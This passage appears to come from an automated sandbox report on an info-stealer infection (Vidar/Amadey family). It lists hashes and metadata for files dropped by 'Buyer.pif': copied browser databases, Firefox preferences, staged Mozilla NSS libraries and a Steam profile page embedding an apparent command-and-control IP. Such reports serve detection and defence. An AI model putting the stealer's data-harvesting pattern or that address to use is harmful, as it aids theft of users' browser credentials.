                                                                                file.exeGet hashmaliciousAmadey, Babadeda, RedLine, Stealc, VidarBrowse
                                                                                  file.exeGet hashmaliciousVidarBrowse
                                                                                    6SoKuOqyNh.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                                                                                      IRqsWvBBMc.exeGet hashmaliciousAmadey, VidarBrowse
                                                                                        file.exeGet hashmaliciousVidarBrowse
                                                                                          file.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                                                                                            JGKjBsQrMc.exeGet hashmaliciousAmadey, Babadeda, RedLine, Stealc, VidarBrowse
                                                                                              file.exeGet hashmaliciousVidarBrowse
                                                                                                file.exeGet hashmaliciousPython Stealer, Amadey, Babadeda, Monster Stealer, RedLine, Stealc, VidarBrowse

                                                                                                  Created / dropped Files

                                                                                                  C:\ProgramData\DBFHDHJKKJDH\AFIEGI

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\447331\Buyer.pif
                                                                                                  File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                  Category:dropped
                                                                                                  Size (bytes):5242880
                                                                                                  Entropy (8bit):0.03859996294213402
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
                                                                                                  MD5:D2A38A463B7925FE3ABE31ECCCE66ACA
                                                                                                  SHA1:A1824888F9E086439B287DEA497F660F3AA4B397
                                                                                                  SHA-256:474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
                                                                                                  SHA-512:62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
                                                                                                  Malicious:false
                                                                                                  Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                  C:\ProgramData\DBFHDHJKKJDH\AFIEGI-shm

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\447331\Buyer.pif
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):32768
                                                                                                  Entropy (8bit):0.017262956703125623
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                  MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                  SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                  SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                  SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                  Malicious:false
                                                                                                  Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                  C:\ProgramData\DBFHDHJKKJDH\BKFCAF

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\447331\Buyer.pif
                                                                                                  File Type:ASCII text, with very long lines (1743), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):9504
                                                                                                  Entropy (8bit):5.512408163813622
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:nnPOeRnWYbBp6RJ0aX+H6SEXKxkHWNBw8D4Sl:PeegJUaJHEw90
                                                                                                  MD5:1191AEB8EAFD5B2D5C29DF9B62C45278
                                                                                                  SHA1:584A8B78810AEE6008839EF3F1AC21FD5435B990
                                                                                                  SHA-256:0BF10710C381F5FCF42F9006D252E6CAFD2F18840865804EA93DAA06658F409A
                                                                                                  SHA-512:86FF4292BF8B6433703E4E650B6A4BF12BC203EF4BBBB2BC0EEEA8A3E6CC1967ABF486EEDCE80704D1023C15487CC34B6B319421D73E033D950DBB1724ABADD5
                                                                                                  Malicious:false
                                                                                                  Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "9e34c6e7-cbed-40a0-ba63-35488e171013");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696426836);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696426837);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

                                                                                                  C:\ProgramData\DBFHDHJKKJDH\BKJKJE

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\447331\Buyer.pif
                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                  Category:dropped
                                                                                                  Size (bytes):40960
                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                  Malicious:false
                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                  C:\ProgramData\DBFHDHJKKJDH\CBKJKJ

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\447331\Buyer.pif
                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                                                  Category:dropped
                                                                                                  Size (bytes):20480
                                                                                                  Entropy (8bit):0.8439810553697228
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                                                  MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                                                  SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                                                  SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                                                  SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                                                  Malicious:false
                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                  C:\ProgramData\DBFHDHJKKJDH\DHJEBG

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\447331\Buyer.pif
                                                                                                  File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):98304
                                                                                                  Entropy (8bit):0.08235737944063153
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                  MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                  SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                  SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                  SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                  Malicious:false
                                                                                                  Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                  C:\ProgramData\DBFHDHJKKJDH\DHJEBG-shm

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\447331\Buyer.pif
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):32768
                                                                                                  Entropy (8bit):0.017262956703125623
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                  MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                  SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                  SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                  SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                  Malicious:false
                                                                                                  Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                  C:\ProgramData\DBFHDHJKKJDH\FBAKEH

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\447331\Buyer.pif
                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                                  Category:dropped
                                                                                                  Size (bytes):159744
                                                                                                  Entropy (8bit):0.5394293526345721
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                                  MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                                  SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                                  SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                                  SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                                  Malicious:false
                                                                                                  Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                  C:\ProgramData\DBFHDHJKKJDH\GCGHCB

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\447331\Buyer.pif
                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                  Category:dropped
                                                                                                  Size (bytes):20480
                                                                                                  Entropy (8bit):0.6732424250451717
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                  MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                  SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                  SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                  SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                  Malicious:false
                                                                                                  Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                  C:\ProgramData\DBFHDHJKKJDH\HDGCAA

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\447331\Buyer.pif
                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):106496
                                                                                                  Entropy (8bit):1.136413900497188
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                  MD5:429F49156428FD53EB06FC82088FD324
                                                                                                  SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                  SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                  SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                  Malicious:false
                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                  C:\ProgramData\DBFHDHJKKJDH\KEHDBA

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\447331\Buyer.pif
                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                  Category:dropped
                                                                                                  Size (bytes):155648
                                                                                                  Entropy (8bit):0.5407252242845243
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                  MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                  SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                  SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                  SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                  Malicious:false
                                                                                                  Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                  C:\ProgramData\freebl3.dll

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\447331\Buyer.pif
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):685392
                                                                                                  Entropy (8bit):6.872871740790978
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                  MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                  SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                  SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                  SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                  Malicious:false
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Joe Sandbox View:
                                                                                                  • Filename: 1lKbb2hF7fYToopfpmEvlyRN.exe, Detection: malicious, Browse
                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                  • Filename: 6SoKuOqyNh.exe, Detection: malicious, Browse
                                                                                                  • Filename: IRqsWvBBMc.exe, Detection: malicious, Browse
                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                  • Filename: JGKjBsQrMc.exe, Detection: malicious, Browse
                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                  C:\ProgramData\mozglue.dll

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\447331\Buyer.pif
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):608080
                                                                                                  Entropy (8bit):6.833616094889818
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                  MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                  SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                  SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                  SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                  Malicious:false
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Joe Sandbox View:
                                                                                                  • Filename: 1lKbb2hF7fYToopfpmEvlyRN.exe, Detection: malicious, Browse
                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                  • Filename: 6SoKuOqyNh.exe, Detection: malicious, Browse
                                                                                                  • Filename: IRqsWvBBMc.exe, Detection: malicious, Browse
                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                  • Filename: JGKjBsQrMc.exe, Detection: malicious, Browse
                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                  C:\ProgramData\msvcp140.dll

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\447331\Buyer.pif
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):450024
                                                                                                  Entropy (8bit):6.673992339875127
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                  MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                  SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                  SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                  SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                  Malicious:false
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                                                                                                  C:\ProgramData\nss3.dll

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\447331\Buyer.pif
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2046288
                                                                                                  Entropy (8bit):6.787733948558952
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                  MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                  SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                  SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                  SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                  Malicious:false
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                  C:\ProgramData\softokn3.dll

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\447331\Buyer.pif
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):257872
                                                                                                  Entropy (8bit):6.727482641240852
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                  MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                  SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                  SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                  SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                  Malicious:false
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                  C:\ProgramData\vcruntime140.dll

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\447331\Buyer.pif
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):80880
                                                                                                  Entropy (8bit):6.920480786566406
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                  MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                  SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                  SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                  SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                  Malicious:false
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\76561199747278259[1].htm

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\447331\Buyer.pif
                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3070), with CRLF, LF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):34725
                                                                                                  Entropy (8bit):5.3989762308442
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:/dpqm+0Ih3tAA9CWGVGfcDAJTBv++nIjBtPF5zfJkPVoEAdLTBv++nIjBtPF5x24:/d8m+0Ih3tAA9CWGVGFJTBv++nIjBtP8
                                                                                                  MD5:2783C762D013D91D1DFA6D835336E028
                                                                                                  SHA1:7F6A759C65D4973440901F4C3DDF85926721A584
                                                                                                  SHA-256:91703EFEA7DDC0AA59216E3D262A5BA269B30FA4EEE453ED8E04536B967E6F96
                                                                                                  SHA-512:31FFDBD13A1003288EB9704CBBC3DBC0321A09F088A7A5A6E408E5C2DB9702196CE0FFC6CE077ABF7794EF4B1D886FBEFF1F884C2D657506350543B7D7822C85
                                                                                                  Malicious:false
                                                                                                  Preview:<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: gi_z2 https://5.75.212.60|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=_D2Bg4UEaFxK&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english" rel="stylesheet" type="text/css" >.<link href

                                                                                                  C:\Users\user\AppData\Local\Temp\447331\Buyer.pif

                                                                                                  Download File
                                                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                  Category:modified
                                                                                                  Size (bytes):946784
                                                                                                  Entropy (8bit):6.628560786473655
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24576:LOo8pEnK4mrqlEZuVZ2HOI+X0l1lMZyYFaeBmyF:LF8p4KpqlEZeXI+X0TVcae3F
                                                                                                  MD5:848164D084384C49937F99D5B894253E
                                                                                                  SHA1:3055EF803EEEC4F175EBF120F94125717EE12444
                                                                                                  SHA-256:F58D3A4B2F3F7F10815C24586FAE91964EEED830369E7E0701B43895B0CEFBD3
                                                                                                  SHA-512:AABE1CF076F48F32542F49A92E4CA9F054B31D5A9949119991B897B9489FE775D8009896408BA49AC43EC431C87C0D385DAEAD9DBBDE7EF6309B0C97BBAF852A
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
